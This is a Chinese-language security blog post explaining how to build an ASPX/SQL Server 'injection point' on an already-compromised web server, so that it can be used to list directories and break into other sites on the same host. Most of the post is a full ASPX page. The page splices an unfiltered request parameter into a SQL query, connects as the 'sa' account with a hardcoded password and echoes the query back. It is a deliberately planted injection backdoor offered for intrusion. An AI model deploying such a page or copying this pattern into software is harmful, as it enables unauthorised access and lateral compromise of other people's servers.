aspx+sqlserver注入点构造

CracerCracer 2015-10-15 代码审计 1,146 0 4

之前本站发表过构造ASP注入点的文章,不知道有没有哥们关注过?其实也就是网上的东西拿来改改,变成自己的,够用就好了。其实严格讲,asp注入点和aspx注入点利用方法也没有太大的区别,最主要的就是在某些情况下,你搞定的网站只支持aspx不支持asp的时候,我们要如何利用自己构造的注入点来进行列目录等操作,从而完成入侵同服其它站点的目的,这时构造aspx注入点就变得有可操作性了。

 

 

<%@ Page Language="C#" AutoEventWireup="true" %>
<%@ Import Namespace="System.Data" %>
<%@ Import namespace="System.Data.SqlClient"  %>
<!DOCTYPE html>
<script runat="server">
     private DataSet resSet=new DataSet();
    protected void Page_Load(object sender, EventArgs e)
    {
        String strconn = "server=.;database=asp_test;uid=sa;pwd=cracer.com";
        string id = Request.Params["id"];
        string sql = string.Format("select * from admin where id={0}", id);
        SqlConnection connection=new SqlConnection(strconn);
        connection.Open();
        SqlDataAdapter dataAdapter = new SqlDataAdapter(sql, connection);
        dataAdapter.Fill(resSet);
        DgData.DataSource = resSet.Tables[0];
        DgData.DataBind();
        Response.Write("执行语句:<br>"+sql);
        Response.Write("<br>结果为:");
    }

</script>

<html xmlns="http://www.w3.org/1999/xhtml">
<head runat="server">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
    <title></title>
</head>
<body>
    <form id="form1" runat="server">
    <div>
    
        <asp:DataGrid ID="DgData" runat="server" BackColor="White" BorderColor="#3366CC" 
            BorderStyle="None" BorderWidth="1px" CellPadding="4" 
                HeaderStyle-CssClass="head" Width="203px">
            <FooterStyle BackColor="#99CCCC" ForeColor="#003399" />
            <SelectedItemStyle BackColor="#009999" Font-Bold="True" ForeColor="#CCFF99" />
            <PagerStyle BackColor="#99CCCC" ForeColor="#003399" HorizontalAlign="Left" 
                Mode="NumericPages" />
            <ItemStyle BackColor="White" ForeColor="#003399" />
<HeaderStyle CssClass="head" BackColor="#003399" Font-Bold="True" ForeColor="#CCCCFF"></HeaderStyle>
        </asp:DataGrid>
    
    </div>
    </form>
</body>
</html>

 

 

 

 

转载请注明来自Cracer,本文标题:《aspx+sqlserver注入点构造》

喜欢 (4) 发布评论
发表评论


Top